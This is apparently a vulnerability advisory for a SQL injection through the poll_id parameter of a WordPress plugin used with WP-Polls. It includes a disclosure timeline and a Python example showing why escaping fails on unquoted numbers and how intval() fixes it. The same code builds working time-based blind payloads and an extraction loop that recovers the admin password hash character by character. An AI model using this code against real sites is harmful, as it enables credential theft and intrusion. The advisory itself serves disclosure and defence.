For this vulnerability, WP-Polls also needs to be installed.
Everyone can access
$_POST["poll_id"] is not escaped properly: mysql_real_escape_string() only escapes \x00, \n, \r, \, ', " and \x1a,
and a payload that avoids those characters (as one aimed at an unquoted numeric value does) passes through it unchanged.
So we can put a SQL injection payload inside it.
$poll_id is not escaped.
Proof of Concept:
This SQL checks whether the first character of the password hash of the user with ID 1 is "$".
If it is, the query sleeps for 5 seconds (a time-based blind injection).
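The following Python block is an added example, not the advisory's PoC (which is not reproduced here) and not code from WP-Polls. It models why mysql_real_escape_string() does not stop an injection into an unquoted numeric value, shows the intval()-style hardening, and drives the time-based probe described above. The table and column names wp_pollsq and pollq_id and the query shape are assumptions for illustration; wp_users.user_pass is WordPress's real users table and column.

```python
# Added example (not the advisory's PoC): models why escaping alone does not
# stop this injection and how a time-based blind probe on it is driven.
# Assumptions: the table/column names wp_pollsq/pollq_id and the query shape
# are illustrative; wp_users.user_pass is WordPress's real users table.
import re
import time
from typing import Callable, Optional

# Exactly the characters PHP's mysql_real_escape_string() escapes.
_MYSQL_ESCAPES = {
    "\x00": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
    "'": "\\'", '"': '\\"', "\x1a": "\\Z",
}


def mysql_real_escape_string(value: str) -> str:
    """Python model of PHP's mysql_real_escape_string() (single-byte charset assumed)."""
    return "".join(_MYSQL_ESCAPES.get(ch, ch) for ch in value)


def intval(value: str) -> int:
    """Model of PHP's intval() on a string: leading integer prefix, otherwise 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def vulnerable_query(poll_id: str) -> str:
    """Escapes, then interpolates the value without quotes (assumed query shape).
    Digits, spaces, parentheses and letters are untouched by the escaper, so a
    payload built only from those survives intact."""
    return ("SELECT pollq_question FROM wp_pollsq WHERE pollq_id = "
            + mysql_real_escape_string(poll_id))


def fixed_query(poll_id: str) -> str:
    """Hardened form: force an integer, which is what $wpdb->prepare()'s %d does."""
    return ("SELECT pollq_question FROM wp_pollsq WHERE pollq_id = "
            + str(intval(poll_id)))


def timing_payload(position: int, candidate: str, delay: int = 5) -> str:
    """poll_id value that makes MySQL sleep `delay` seconds when character
    `position` (1-based) of user ID 1's password hash equals `candidate`.
    The candidate goes in as a hex literal (0x24 for '$') so the payload
    needs no quote characters, the only ones the escaper would alter."""
    hexlit = "0x" + candidate.encode().hex()
    return (f"1 AND IF(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),"
            f"{position},1)={hexlit},SLEEP({delay}),0)")


def extract_char(position: int, send: Callable[[str], float],
                 alphabet: str, delay: int = 5) -> Optional[str]:
    """Time-based oracle loop. `send` submits one poll_id value and returns the
    request's duration in seconds; the first candidate whose request takes at
    least `delay` seconds is the character at `position`, None if none hits."""
    for ch in alphabet:
        if send(timing_payload(position, ch, delay)) >= delay:
            return ch
    return None


def timed(post: Callable[[str], None]) -> Callable[[str], float]:
    """Wraps a real request function (e.g. one issuing the HTTP POST) so it
    returns the elapsed seconds, the shape extract_char() expects."""
    def _send(poll_id: str) -> float:
        start = time.monotonic()
        post(poll_id)
        return time.monotonic() - start
    return _send


if __name__ == "__main__":
    payload = timing_payload(1, "$")
    print(vulnerable_query(payload))   # payload passes through the escaper unchanged
    print(fixed_query(payload))        # ... WHERE pollq_id = 1
```

In practice `send` would be `timed(...)` around the HTTP request that submits poll_id; against a real target the threshold should also be compared with a measured baseline, since a slow server can produce false positives.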
- 07-04-2015: Discovered
- 07-04-2015: Vendor notified
- 12-04-2015: Version 0.8.4.9 released, issue resolved